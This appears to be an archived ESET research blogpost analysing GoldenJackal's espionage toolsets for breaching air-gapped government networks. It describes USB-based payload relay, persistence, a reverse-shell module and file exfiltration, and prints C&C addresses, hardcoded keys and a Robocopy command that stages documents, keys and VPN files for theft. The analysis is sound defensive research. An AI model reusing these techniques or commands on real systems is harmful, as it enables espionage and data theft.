{ "id": "efb3ef34-3a02-4f65-a656-2e4adfbdd7cf", "created_at": "2026-04-06T00:12:49.950945Z", "updated_at": "2026-04-10T03:33:35.592122Z", "deleted_at": null, "sha1_hash": "7439fdf6bdddb43015fe67a25183dbcbf270b8aa", "title": "Mind the (air) gap: GoldenJackal gooses government guardrails", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 855558, "plain_text": "Mind the (air) gap: GoldenJackal gooses government guardrails\r\nBy Matías Porolli\r\nArchived: 2026-04-05 16:02:42 UTC\r\nESET researchers discovered a series of attacks on a governmental organization in Europe using tools capable of targeting\r\nair-gapped systems. The campaign, which we attribute to GoldenJackal, a cyberespionage APT group that targets\r\ngovernment and diplomatic entities, took place from May 2022 to March 2024. By analyzing the toolset deployed by the\r\ngroup, we were able to identify an attack GoldenJackal carried out earlier, in 2019, against a South Asian embassy in\r\nBelarus that, yet again, targeted the embassy’s air-gapped systems with custom tools.\r\nThis blogpost introduces previously undocumented tools that we attribute to GoldenJackal based on victimology, code, and\r\nfunctional similarities between the toolsets.\r\nKey points of the blogpost:\r\nGoldenJackal used a custom toolset to target air-gapped systems at a South Asian embassy in Belarus since\r\nat least August 2019. In this blogpost, we describe these tools publicly for the first time.\r\nThis blogpost also features the first public description of a highly modular toolset GoldenJackal deployed\r\non various occasions between May 2022 and March 2024 against a national government organization of a\r\ncountry in the European Union.\r\nThese toolsets provide GoldenJackal a wide set of capabilities for compromising and persisting in targeted\r\nnetworks. Victimized systems are abused to collect interesting information, process the information,\r\nexfiltrate files, and distribute files, configurations and commands to other systems.\r\nThe ultimate goal of GoldenJackal seems to be stealing confidential information, especially from high-profile machines that might not be connected to the internet.\r\nGoldenJackal profile\r\nGoldenJackal is an APT group active since at least 2019. It targets government and diplomatic entities in Europe, the Middle\r\nEast, and South Asia. The group is little known and has only been publicly described in 2023 by Kaspersky. The group’s\r\nknown toolset includes several implants written in C#: JackalControl, JackalSteal, JackalWorm, JackalPerInfo, and\r\nJackalScreenWatcher – all of them used for espionage.\r\nOverview\r\nIn May 2022, we discovered a toolset that we could not attribute to any APT group. But once the attackers used a tool\r\nsimilar to one of those publicly documented by Kaspersky, we were able to dig deeper and to find a connection between the\r\npublicly documented toolset of GoldenJackal and this new one.\r\nExtrapolating from that, we managed to identify an earlier attack where the publicly documented toolset was deployed, as\r\nwell as an older toolset that also has capabilities to target air-gapped systems. This blogpost shines a light on the technical\r\naspects of the publicly undocumented toolsets, and shares some insights about GoldenJackal’s tactics, techniques, and\r\nprocedures.\r\nVictimology\r\nGoldenJackal has been targeting governmental entities in Europe, the Middle East, and South Asia. We detected\r\nGoldenJackal tools at a South Asian embassy in Belarus in August and September 2019, and again in July 2021.\r\nKaspersky reported a limited number of attacks against government and diplomatic entities in the Middle East and South\r\nAsia, starting in 2020.\r\nMore recently, according to ESET telemetry, a national government organization of a country in the European Union was\r\nrepeatedly targeted from May 2022 until March 2024.\r\nAttribution\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 1 of 21\n\nAll the campaigns that we describe in this blogpost deployed, at some point, at least one of the tools attributed to the\r\nGoldenJackal APT group by Kaspersky. As was the case in the Kaspersky report, we can’t attribute GoldenJackal’s activities\r\nto any specific nation-state. There is, however, one clue that might point towards the origin of the attacks: in the\r\nGoldenHowl malware, the C\u0026C protocol is referred to as transport_http, which is an expression typically used by Turla (see\r\nour ComRat v4 report) and MoustachedBouncer. This may indicate that the developers of GoldenHowl are Russian\r\nspeakers.\r\nBreaching air-gapped systems\r\nIn order to minimize the risk of compromise, highly sensitive networks are often air gapped, i.e., isolated from other\r\nnetworks. Usually, organizations will air gap their most valuable systems, such as voting systems and industrial control\r\nsystems running power grids. These are often precisely the networks that are of most interest to attackers.\r\nAs we stated in a previous white paper titled Jumping the air gap: 15 years of nation-state effort, compromising an air-gapped network is much more resource-intensive than breaching an internet-connected system, which means that\r\nframeworks designed to attack air-gapped networks have so far been exclusively developed by APT groups. The purpose of\r\nsuch attacks is always espionage, perhaps with a side of sabotage.\r\nWith the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not\r\none, but two separate toolsets designed to compromise air-gapped systems. This speaks to the resourcefulness of the group.\r\nThe attacks against a South Asian embassy in Belarus made use of custom tools that we have only seen in that specific\r\ninstance. The campaign used three main components: GoldenDealer to deliver executables to the air-gapped system via USB\r\nmonitoring; GoldenHowl, a modular backdoor with various functionalities; and GoldenRobo, a file collector and exfiltrator.\r\nIn the latest series of attacks against a government organization in Europe, GoldenJackal moved on from the original toolset\r\nto a new, highly modular one. This modular approach applied not only to the design of the malicious tools (as was the case\r\nwith GoldenHowl), but also to their roles: they were used, among other things, to collect and process interesting\r\ninformation, to distribute files, configurations, and commands to other systems, and to exfiltrate files.\r\nTechnical analysis\r\nInitial access\r\nSo far, we haven’t been able to trace back to the initial compromise vector in the campaigns seen in our telemetry. Note that\r\nKaspersky reported in a blogpost that GoldenJackal used trojanized software and malicious documents for this purpose.\r\nThe mysterious toolset from 2019\r\nThe earliest attack that we have attributed to GoldenJackal, which targeted a South Asian embassy in Belarus, occurred in\r\nAugust 2019. The toolset used in this attack is, to the best of our knowledge, publicly undocumented. We’ve only observed\r\nthe following custom tools once, and never again:\r\nA malicious component that can deliver executables to air-gapped systems via USB drives. We’ve named this\r\ncomponent GoldenDealer.\r\nA backdoor, which we’ve named GoldenHowl, with various modules for malicious capabilities.\r\nA malicious file collector and exfiltrator, which we’ve named GoldenRobo.\r\nAn overview of the attack is shown in Figure 1. The initial attack vector is unknown, so we assume that GoldenDealer and\r\nan unknown worm component are already present on a compromised PC that has access to the internet. Whenever a USB\r\ndrive is inserted, the unknown component copies itself and the GoldenDealer component to the drive. While we didn’t\r\nobserve this unknown component, we have seen components with similar purposes – such as JackalWorm – in other toolsets\r\nused in later attacks performed by the group.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 2 of 21\n\nFigure 1. Overview of the initial compromise of an air-gapped system\r\nIt is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself\r\nwith the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to\r\nentice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.\r\nWhen the drive is again inserted into the internet-connected PC, GoldenDealer takes the information about the air-gapped\r\nPC from the USB drive and sends it to the C\u0026C server. The server replies with one or more executables to be run on the air-gapped PC. Finally, when the drive is again inserted into the air-gapped PC, GoldenDealer takes the executables from the\r\ndrive and runs them. Note that this time no user interaction is needed, because GoldenDealer is already running.\r\nWe have observed GoldenDealer running GoldenHowl on an internet-connected PC. While we didn’t observe GoldenDealer\r\ndirectly executing GoldenRobo, we observed the latter also running on the connected PC, used to take files from the USB\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 3 of 21\n\ndrive and exfiltrate them to its C\u0026C server. There must be yet another unknown component that copies files from the air-gapped PC to the USB drive, but we haven’t observed it yet.\r\nGoldenDealer\r\nThis component monitors the insertion of removable drives on both air-gapped and connected PCs, as well as internet\r\nconnectivity. Based on the latter, it can download executable files from a C\u0026C server and hide them on removable drives, or\r\nretrieve them from these drives and execute them on systems that have no connectivity.\r\nThe program can be run with or without arguments. When run with arguments, it takes a path to a file that it moves to a new\r\nlocation and then runs via the CreateProcessW API without creating a window.\r\nTo prevent hidden files being shown in Windows Explorer, GoldenDealer creates the ShowSuperHidden value in the\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced registry key, and sets it to zero.\r\nIn case GoldenDealer is not running as a service, it creates and starts a service called NetDnsActivatorSharing, then exits. If\r\nfor any reason the service couldn’t be created, persistence is achieved by creating an entry in a Run registry key.\r\nTable 1 shows the list of configuration files used by GoldenDealer. These are located in the directory from which the\r\nmalware is running: C:\\Windows\\TAPI in the observed attack. More details about these files is provided in subsequent\r\nsections.\r\nTable 1. Configuration files used by GoldenDealer\r\nFilename  Purpose \r\nb8b9-de4d-3b06-\r\n9d44 \r\nStore status fields. \r\nfb43-138c-2eb0-c651  Store executable files sent by the C\u0026C server. \r\n130d-1154-30ce-be1e \r\nStore information about all compromised PCs in the network. \r\n38c4-abb9-74f5-c4e5 \r\nUsed as a mutex. If this file is open, it means that an instance of GoldenDealer is already\r\nrunning. \r\nThe contents of configuration files are JSON formatted, and stored XOR encrypted on disk. XOR encryption is performed\r\none byte at a time, with a single-byte key that is incremented based on a multiplier.\r\nNetwork connectivity thread\r\nIn order to determine whether a PC is connected to the internet, GoldenDealer sends a GET request to\r\nhttps://1.1.1.1/\u003cuser_id\u003e every 15 minutes. If the connection fails, or there’s no reply, the PC is assumed to be offline.\r\n1.1.1.1 maps to Cloudflare’s DNS resolver, and the expected behavior is to receive a Not Found document and a 404 status\r\ncode. The \u003cuser_id\u003e part is not relevant here, but is used for C\u0026C communication. GoldenDealer generates this user\r\nidentifier based on:\r\nThe current username as found via the GetUserNameW API.\r\nThe serial number of the first available logical drive in the system. This does not necessarily mean the drive where\r\nthe OS is installed.\r\nThese two strings are separately hashed with the FNV-1a function, and the resulting numbers are XORed together, obtaining\r\na number that identifies the user.\r\nTo keep track of network connectivity status, GoldenDealer uses a global variable that can hold any of the following values:\r\n0 – Malware started running and connectivity has not been checked.\r\n1 – PC doesn’t have internet connectivity.\r\n2 – PC has internet connectivity.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 4 of 21\n\nIf the status is 2, a thread is signaled to download executable files from the C\u0026C server, and another thread is signaled to\r\ncopy the executables to USB drives. A thread to get executables from drives and run them will only be signaled when the\r\nstatus is 1. Whenever the status changes, the configuration file b8b9-de4d-3b06-9d44 is updated with the new value. Fields\r\nin this file are:\r\nwmk – network connectivity status.\r\nqotwnk – number of seconds without internet. This value is incremented every 15 minutes and reset to zero when\r\nthere’s connectivity. It can be used if the malware is configured to wait a minimum number of seconds before\r\ndeciding that the PC has no connectivity, but there was no wait in the samples that we observed.\r\nltwnk – unknown. This field is not used by the malware.\r\nrpk – list with hashes of executables downloaded from the C\u0026C server.\r\nDownloader thread\r\nThis thread checks the network connectivity status every 30 minutes, and only performs the following actions if the PC is\r\nconnected to the internet. First, a GET request is sent to https://83.24.9[.]124/\u003cuser_id\u003e, just to let the C\u0026C server know\r\nthat another request is to follow. The reply from the server is not processed. If the request fails, then another request is sent\r\nto a secondary server, http://196.29.32[.]210/\u003cuser_id\u003e, probably to notify about failure, as the thread doesn’t continue to\r\nexecute in this case. The URLs are hardcoded in the malware and are not configurable in the samples that we observed.\r\nWhen communication is successful, GoldenDealer sends a request to https://83.24.9[.]124/\u003cuser_id\u003e/fc93-10f4-2a68-d548.\r\nThe server replies with an array of JSON objects with the following fields:\r\nek – a base64-encoded string that is an executable file after being decoded,\r\ntpik – an array of user_ids used to decide whether the executable will be run,\r\nhek – the FNV-1a hash of ek, and\r\napk – date and time when the executable was obtained from the C\u0026C server.\r\nThe contents of the last two fields are not relevant, because they are calculated by the downloader thread, replacing original\r\ndata sent by the C\u0026C server. In both cases, they are stored as decimal numbers.\r\nGoldenDealer will run an executable sent by the server if the corresponding user_id is in the tpik list, and the hek hash is not\r\nin the list of hashes stored in the rpk field in the configuration. In other words, connected PCs can download executables and\r\npass them along to other systems via USB drives, but they can also run received executables. When an executable is run, its\r\nhash is added to the rpk list, ensuring that it will only be executed once by that victim. Each executable is written in the\r\nworking directory with the value of \u003chek\u003e as its filename. All JSON objects with received executables are stored on disk, in\r\nthe file fb43-138c-2eb0-c651.\r\nAs the final step, the downloader thread collects information about the compromised system and sends it to\r\nhttps://83.24.9[.]124/\u003cuser_id\u003e/a1e7-4228-df20-1600. The configuration file 130d-1154-30ce-be1e is updated to store this\r\ninformation as well. Figure 2 shows part of the JSON object with the information sent to the C\u0026C server. While all strings\r\nare sent as arrays of decimal character codes, for readability we show them as strings in the image. For example, instead of\r\nlsass.exe, the value [108, 115, 97, 115, 115, 46, 101, 120, 101] is actually sent.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 5 of 21\n\nFigure 2. Part of the information sent by the downloader thread to the C\u0026C server\r\nThe members are:\r\niepk – a Boolean value that indicates whether the GoldenDealer process is elevated,\r\npclk – an array of running processes,\r\npglk – an array of installed programs in both Program Files and Program Files (x86) directories,\r\npik – the user_id,\r\nsik – information about the operating system (including version, build, service pack number; architecture; and\r\nBoolean values indicating whether the OS is running on a server, domain controller, or workstation),\r\nuck – the user who is running the GoldenDealer process, and\r\nulk – an array of all users, each with a Boolean value indicating whether the user has administrator privileges.\r\nUSB monitoring thread on connected PCs\r\nGoldenDealer monitors the insertion of removable drives by creating a window titled defaultWindow with a custom event\r\nhandler that processes inserted devices and ignores all other system events.\r\nOnce a USB drive has been inserted, this thread patches one byte in the master boot record (MBR) of that drive: it searches\r\nfor the offset where the BOOTMGR string resides, and replaces the first O with 0. Then it checks whether the second O has\r\nalso been patched to 0, and exits if it hasn’t. The USB thread that runs on air-gapped PCs does the opposite: it patches the\r\nsecond O, and checks whether the first has already been patched. This means that the USB drive needs to have been inserted\r\nin both a connected PC and an air-gapped PC for the drive to be processed.\r\nIf the check is successful, a hidden directory is created on the USB drive, with two files written inside:\r\n37b3-ebe5-568e-0676 – this file has the same contents as fb43-138c-2eb0-c651 (all the executables sent by the C\u0026C\r\nserver). It’s used to pass the executables to air-gapped systems, for execution.\r\nbc41-ac6f-e55e-61a8 – a file with information from air-gapped PCs. It’s created empty by this thread, then populated\r\nby the USB thread running on air-gapped PCs. The contents of this file are appended to the local file 130d-1154-\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 6 of 21\n\n30ce-be1e (see Table 1), to be sent to the C\u0026C server by the downloader thread.\r\nUSB monitoring thread on air-gapped PCs\r\nThis is complementary to the thread described in the previous section: it takes the file 37b3-ebe5-568e-0676 with\r\nexecutables on the USB drive and copies its contents to the local file fb43-138c-2eb0-c651. It also takes the local file 130d-1154-30ce-be1e with information about the air-gapped system and adds its contents to the bc41-ac6f-e55e-61a8 file on the\r\nUSB drive. The code to obtain system information and to run executables is contained in this thread.\r\nGoldenHowl\r\nAnother tool from GoldenJackal’s 2019 toolset is GoldenHowl, a backdoor written in Python that consists of various\r\nmodules for malicious functionalities. It is distributed as a self-extracting archive that contains legitimate Python binaries\r\nand libraries, as well as malicious scripts. Figure 3 shows the contents of one of these archives. The attackers renamed the\r\nPython executable – in version 2.7.15 – as WinAeroModule.exe. This component is intended to be run on PCs with internet\r\nconnectivity, given its functionalities.\r\nFigure 3. Contents of GoldenHowl’s self-extracting archive\r\nThe initial script in GoldenHowl, referred to as core_script in the malware’s configuration file, performs the following\r\nactions:\r\ndecrypts and loads the malware’s configuration from a JSON file,\r\ncreates directories used by the malware, and\r\nstarts a thread for each module.\r\nThe malware’s configuration is decrypted using the Fernet algorithm, with the hardcoded key\r\n_ylmUTbqcx6FxMZ5ZvNxDQZYuNh41yxhKcPJLzxgqEY=. Figure 4 shows part of the decrypted configuration.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 7 of 21\n\nFigure 4. Part of GoldenHowl’s decrypted configuration\r\nTable 2 shows the Python modules that we’ve observed – in the order that they appear in the config – along with a\r\ndescription of their functionalities. All modules run indefinitely, except for the persistence_schtasks module, which runs\r\nonly once.\r\nTable 2. Malicious modules in GoldenHowl\r\nModule name  File on disk  Description \r\npersistence_schtasks \r\n5991-8d44-\r\nb226-0e6c.py \r\nCreates the scheduled task\r\nMicrosoft\\Windows\\Multimedia\\SystemSoundsService2 to persist the\r\nexecution of core_script. \r\nfiles_tree \r\nedc5-4055-\r\n37cd-d2d2.py \r\nGenerates a listing of files and directories by calling Windows’ tree\r\ncommand, for a path specified in a request sent by the C\u0026C. \r\nfiles_stealer \r\n5488-240b-c00f-203a.py Exfiltrates a single file to the C\u0026C server. The file path is specified in a\r\nrequest sent by the C\u0026C. \r\ndata_transform \r\n8744-a287-\r\n35be-4ea0.py \r\nUtility module that takes incoming requests from the C\u0026C server and\r\ndecrypts them, and takes responses from other modules that need to be sent\r\nto the C\u0026C and encrypts them. The encryption algorithm is Fernet, and the\r\nkey is specific to this module:\r\nQRqXhd_iB_Y3LpT2wTVK6Dao5uOq2m5KMiVkMnJfgw4= \r\ntransport_http  63d5-be5f-e4df-7e65.py Utility module that uploads and downloads files from the C\u0026C server. See\r\nthe C\u0026C communication section for more information. Note that the word\r\ntransport is commonly used by Turla and MoustachedBouncer to refer to a\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 8 of 21\n\nModule name  File on disk  Description \r\ntype of C\u0026C protocol. Although this might be shared across Russian-speaking developers, this is a low confidence element for attribution. \r\nupdater \r\nc7b4-0999-\r\naec4-a0c8.py \r\nUtility module that receives a ZIP archive with updated modules or\r\nconfiguration from the C\u0026C server, extracts the archive, and runs core_script\r\nin a new process, terminating the current process. \r\nsshcmd \r\n1ee0-7c3a-3331-4df3.py Connects to an SSH server specified in a request sent by the C\u0026C. Acts as a\r\nreverse shell, executing commands received from the C\u0026C. \r\nipscanner \r\na86b-108c-36c7-6972.py \r\nGenerates a listing with active IP addresses in an IP range, based on an IP\r\nmask specified in a request sent by the C\u0026C server. To do so, it first sends a\r\nmessage to all IP addresses in the range, on port 59173, and then it runs the\r\ncommand arp -a to obtain the ARP cache tables for all interfaces. \r\nportscanner \r\n2648-69f9-\r\n6dc0-3476.py \r\nGenerates a listing with ports that are accepting connections, based on an IP\r\naddress and a list of ports specified in a request sent by the C\u0026C server. \r\nsshtunnel \r\n9ea4-fb87-\r\n6d57-924a.py \r\nCreates an SSH tunnel with an SSH server, to forward messages going from\r\n(and to) a host on a listening port, to a forwarding port on the SSH server. A\r\nrequest from the C\u0026C server specifies: the address and port of the SSH\r\nserver, username and password for the SSH session, the forwarding port on\r\nthe SSH server, and the address and port of the listening host. \r\neternalbluechecker \r\n4b19-7f72-\r\n8c17-dceb.py \r\nChecks whether a host, specified in a request sent by the C\u0026C server, is\r\nvulnerable to a Windows SMB remote code execution vulnerability. The\r\ncode for this module is the same as in mysmb.py and checker.py from this\r\npublic repository. There is no code in this module to exploit vulnerable\r\nhosts. \r\nsocks_proxy \r\n8b55-3ac9-\r\n5c30-d0c4.py \r\nActs as a proxy server, forwarding packets from a source address to a\r\ndestination address. The port to listen for incoming connections is specified\r\nin a request sent by the C\u0026C server. The code in this module is very similar\r\nto that of pysoxy. \r\ntext_writer \r\n0ffc-667e-dce4-b270.py Writes a text file to a given path. The path and text for writing are specified\r\nin a request sent by the C\u0026C server. \r\nC\u0026C communication\r\nAccording to GoldenHowl’s configuration, anything that comes from the C\u0026C server is called a request, and files going to\r\nthe C\u0026C server represent a response. It should be noted that despite this naming convention, GoldenHowl is not a passive\r\nimplant: it initiates the connections to the C\u0026C server. The transport_http module is responsible for communication with the\r\nC\u0026C server, and for writing requests and responses to specific directories. Table 3 shows directories used by GoldenHowl.\r\nTable 3. Directories in GoldenHowl’s configuration\r\nName in configuration  Name on disk  Description \r\ndownload_dir  a700‑280c‑f067‑5a06  Stores encrypted requests coming from the C\u0026C server. \r\nupload_dir  b307‑05ea‑7ac8‑c369 \r\nStores encrypted responses, with files or output of commands, to\r\nbe sent to the C\u0026C server. \r\ndata_dir  cda2‑b818‑3403‑b564  Stores requests sent by the C\u0026C server, which are taken from\r\ndownload_dir, decrypted, and placed in this directory for modules\r\nto process. Also stores output of executed commands (responses),\r\nwhich are taken from this directory, encrypted, and written to\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 9 of 21\n\nName in configuration  Name on disk  Description \r\nupload_dir. These actions are performed by the data_transform\r\nmodule. \r\ntemp_dir  5bc5‑0788‑d469‑2f3a  This directory was not used in any observed modules. \r\nRequests and responses have structured filenames:\r\nRequest – \u003cclient_id\u003e\u003cmodule_id\u003e\u003crequest_id\u003e\u003crequest_suffix\u003e\r\nResponse – \u003cclient_id\u003e\u003cmodule_id\u003e\u003crequest_id\u003e\u003cresponse_suffix\u003e\r\nThe fields client_id, request_suffix, and response_suffix are specified in the configuration and are common to all modules\r\n(see Figure 4 for examples). The field module_id indicates which module needs to process a request or generate a response,\r\nand is defined in the configuration section of each individual module. The field request_id is generated on the C\u0026C server,\r\nand ties together requests with responses.\r\nThe transport_http module sends GET requests periodically to the C\u0026C server to check for available requests. The\r\nconfiguration fields specific to this module are:\r\nserver_address – address of the C\u0026C server (we observed 83.24.9[.]124, the same address as GoldenDealer’s server),\r\nserver_port – the port used to communicate with the server (we observed 443),\r\nserver_use_ssl – indicates whether HTTP or HTTPS will be used for communication,\r\nbase_timeout_sec – the minimum wait time before contacting the C\u0026C server, and\r\ntimeout_filename – the filename of a text file with a number between 0 and 3600, to specify a different number of\r\nseconds to wait between communications. This file is not included with GoldenHowl, but it could be placed by the\r\nattackers with the text_writer module.\r\nThe address used to contact the C\u0026C server is https://\u003cserver_address\u003e:\u003cserver_port\u003e/\u003cclient_id\u003e/.\r\nGoldenRobo\r\nThe last of the observed tools from the 2019 toolset, GoldenRobo, is a simple component written in Go that executes the\r\nRobocopy utility to stage files and send them to its C\u0026C server. It iterates across all drive letters from A to Z, trying to\r\naccess each drive. If successful, a Robocopy command is constructed:\r\nrobocopy \u003cdrive_letter\u003e:\\ \u003cmalware_folder\u003e\\1516-fe89-ad12-8102\\\u003cdrive_letter\u003e\\ *.doc *.docx *.xls *.xlsx *.ppt *.pptx\r\n*.pdf *.rtf *.tif *.jpg *.jpeg *.crt *.key *.p12 *.ovpn *.zip *.rar \"\" /S /R:0 /MAXAGE:7 /XD \u003cmalware_folder\u003e\\1516-fe89-\r\nad12-8102\\\\ 1516-fe89-ad12-8102\\\\ \"Application Data\" \"All Users\" \"Documents and Settings\" \"Local Settings\"\r\nIf we break down the command:\r\nfiles are copied from drive_letter,\r\nto \u003cmalware_folder\u003e\\1516-fe89-ad12-8102\\\u003cdrive_letter\u003e\\ (for example: C:\\Windows\\TAPI\\1516-fe89-ad12-\r\n8102\\C\\),\r\nonly if the files have extensions .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .jpg, .jpeg, .crt, .key, .p12, .ovpn,\r\n.zip, or .rar,\r\nincluding subdirectories (/S),\r\nnot retrying on failed copies (/R:0),\r\nexcluding files older than seven days (/MAXAGE:7), and\r\nexcluding specified directories (/XD).\r\nCopied files from all drives are archived together in a ZIP file _1423-da77-fe86\u003cmonth\u003e-\u003cday\u003e in the same directory where\r\nGoldenRobo is running (with \u003cmonth\u003e and \u003cday\u003e corresponding to the current date).\r\nThe archive is sent base64 encoded to https://83.24.9[.]124/8102/. The last part of the URL is 8102, which is the same as the\r\nclient_id field in GoldenHowl’s configuration. This URL is hardcoded in GoldenRobo, which tells us that the attackers\r\ncompiled this version of GoldenRobo for this victim exclusively.\r\nThe known toolset: Previously documented by Kaspersky\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 10 of 21\n\nA few weeks after deploying the previous toolset, GoldenJackal started to use other malicious tools on the same\r\ncompromised computers. In September 2019, we observed the execution of PowerShell scripts to download the\r\nJackalControl backdoor. This backdoor was used to execute other PowerShell scripts, to download and run legitimate tools\r\nsuch as Plink and PsExec.\r\nIn various attacks, between September 2019 and January 2024, we observed the following tools in GoldenJackal’s arsenal:\r\nJackalControl,\r\nJackalSteal, a file collector and exfiltrator, and\r\nJackalWorm, used to propagate other malicious components via USB drives. We observed it propagating the\r\nJackalControl backdoor.\r\nAs these components have already been documented by Kaspersky, we will not describe them in this blogpost. However,\r\none interesting point to mention is that in early versions of these tools, URLs for C\u0026C servers were hardcoded in the\r\nmalware binaries. At some point, GoldenJackal modified JackalControl and JackalSteal to receive C\u0026C servers as\r\narguments.\r\nThe latest toolset: Keeping a foothold in the network\r\nIn May 2022, we observed GoldenJackal using a new toolset while targeting a governmental organization in Europe. Most\r\nof these tools are written in Go and provide diverse capabilities, such as collecting files from USB drives, spreading\r\npayloads in the network via USB drives, exfiltrating files, and using some PCs in the network as servers to deliver diverse\r\nfiles to other systems. In addition, we have seen the attackers using Impacket to move laterally across the network.\r\nIn the observed attacks, GoldenJackal started to use a highly modular approach, using various components to perform\r\ndifferent tasks. Some hosts were abused to exfiltrate files, others were used as local servers to receive and distribute staged\r\nfiles or configuration files, and others were deemed interesting for file collection, for espionage purposes. Figure 5 shows a\r\nclassification of the components that are described over the next sections.\r\nFigure 5. Components in GoldenJackal’s latest toolset\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 11 of 21\n\nRegarding network infrastructure, we didn’t observe any external IP addresses in any of the analyzed components. File\r\nexfiltrators use publicly available services such as Google Drive or Outlook SMTP servers.\r\nGoldenUsbCopy\r\nGoldenUsbCopy, which we classify as a collection component, monitors the insertion of USB drives, and copies interesting\r\nfiles to an encrypted container that is stored on disk, to be exfiltrated by other components. According to strings found in the\r\nbinary, the main package for the application is named UsbCopy.\r\nNewly inserted drives are detected by creating a window with name WindowsUpdateManager, to receive system events and\r\nprocess them with a custom handler. If the handler receives a WM_DEVICECHANGE message, with an event type\r\nDBT_DEVICEARRIVAL, and the device type is DBT_DEVTYP_VOLUME, this means a new drive is ready to be\r\nprocessed. Figure 6 shows a side-by-side comparison between decompiled code in GoldenUsbCopy and GoldenDealer. Even\r\nthough each was written in a different programming language, we can see that the code retrieves the letter of the drive to\r\nprocess in the same manner.\r\nFigure 6. Code comparison between GoldenUsbCopy and GoldenDealer\r\nGoldenUsbCopy determines which files to process from a USB drive based on a configuration that is stored AES encrypted\r\nin CFB mode in the file reports.ini. The 32-byte key to decrypt the configuration is hardcoded in the malware. After\r\ndecryption, the configuration contains the following fields, in JSON format:\r\noutputCipherFilename – full path to an encrypted archive that acts as a container for other files, such as files that\r\ncontain listings of filenames from newly inserted drives, and files to be exfiltrated,\r\nRSAKey – a public key to encrypt AES keys that are used to encrypt files to be exfiltrated,\r\nlastDate – files that were last modified more than lastDate days ago are not processed,\r\nregistryKey – a key in HKEY_CURRENT_USER that will store SHA-256 hashes of files already processed for\r\nexfiltration,\r\nregistryValue – the registry value that stores the list of hashes,\r\nmaxZIPSize – the maximum size in bytes for outputCipherFilename (more details below),\r\nmaxFileSize – files larger than maxFileSize, in bytes, are not exfiltrated, and\r\nextensionsFile – a list of file extensions for exfiltration (we observed .docx, .pdf, .doc, and .odt).\r\nOnce the configuration is decrypted, GoldenUsbCopy waits for a USB drive to be inserted. A listing of all files on the\r\ninserted drive is written to a text file, which is then archived in a ZIP file, encrypted with AES, and added to\r\noutputCipherFilename. Only the encrypted container is written to disk; intermediate steps, involving text files and archives,\r\nare kept in memory.\r\nA similar procedure is done for files on the drive that meet the criteria for exfiltration: these files are archived together\r\npreserving their directory structure, encrypted with AES, and added to outputCipherFilename. When selecting files for\r\nexfiltration, a list with SHA-256 hashes is retrieved from the registry. If the hash of a file is in that list, the file is not\r\nexfiltrated. If the hash isn’t in the list, it is added, so that the file won’t be exfiltrated again.\r\nWhenever adding files to exfiltrate would exceed the maxZIPSize of outputCipherFilename, the excess files are not added to\r\nthe archive for exfiltration, but their paths are added to a text file that is archived, encrypted, and added to\r\noutputCipherFilename.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 12 of 21\n\nRegarding encryption, each individual archive that is added to the encrypted container is encrypted with AES in CFB mode,\r\nwith a key and an initialization vector (IV) that are randomly generated on the spot. Both the key and IV need to be stored,\r\nbut only the key is encrypted with RSAKey. Figure 7 shows an example of how these fields are stored in the encrypted\r\ncontainer.\r\nFigure 7. Structure of the encrypted container\r\nGoldenUsbGo\r\nThis component is very similar to GoldenUsbCopy and seems to be a later version of it, based on when we observed them in\r\nour telemetry and comparing Go versions used to compile them. However, GoldenUsbGo achieves the same functionality\r\nwith a simpler implementation:\r\nThere is no configuration file. All criteria for file selection are hardcoded in the malware:\r\nif filename contains a specific word from a list, process the file regardless of all other criteria (the list contains\r\nstrings such as pass, login, and key),\r\nelse, file size must be no bigger than 20 MB,\r\nthe date the file was last modified must be no more than 14 days ago, and\r\nthe file extension must be one of .pdf, .doc, .docx, .sh, or .bat.\r\nInsertion of removable drives is not continuously monitored. A hardcoded list of drive letters is checked periodically\r\nto determine if they have an assigned volume of D:, E:, F:, G:, or H:.\r\nThe list of hashes of files that were already processed is kept in memory only.\r\nThere is no size limit for the encrypted container where files are staged for exfiltration.\r\nFiles are not archived but instead are compressed with gzip. Both file contents and filenames are compressed. Figure\r\n8 shows how compressed data is arranged before encryption.\r\nFigure 8. Fields used for gzip-compressed files, before encryption\r\nThe path to the encrypted container is hardcoded in the malware:\r\nC:\\Users\\[redacted]\\appdata\\local\\SquirrelTemp\\SquirrelCache.dat\r\nThe hardcoded username in the path, redacted above, along with the short list of drives and specific filenames to process,\r\ntell us that GoldenUsbGo was compiled and tailored for this particular victim.\r\nCompressed files are encrypted with AES in CFB mode with the hardcoded key Fn$@-fR_*+!13bN5. The structure is the\r\nsame as in GoldenUsbCopy (shown in Figure 7) but without the AES key. After compressing the files, GoldenUsbGo\r\ngenerates a listing of all files on the inserted drive and adds it to the encrypted container, in the same manner as exfiltrated\r\nfiles. The filename for the listing is formed from the current date and time, replacing : 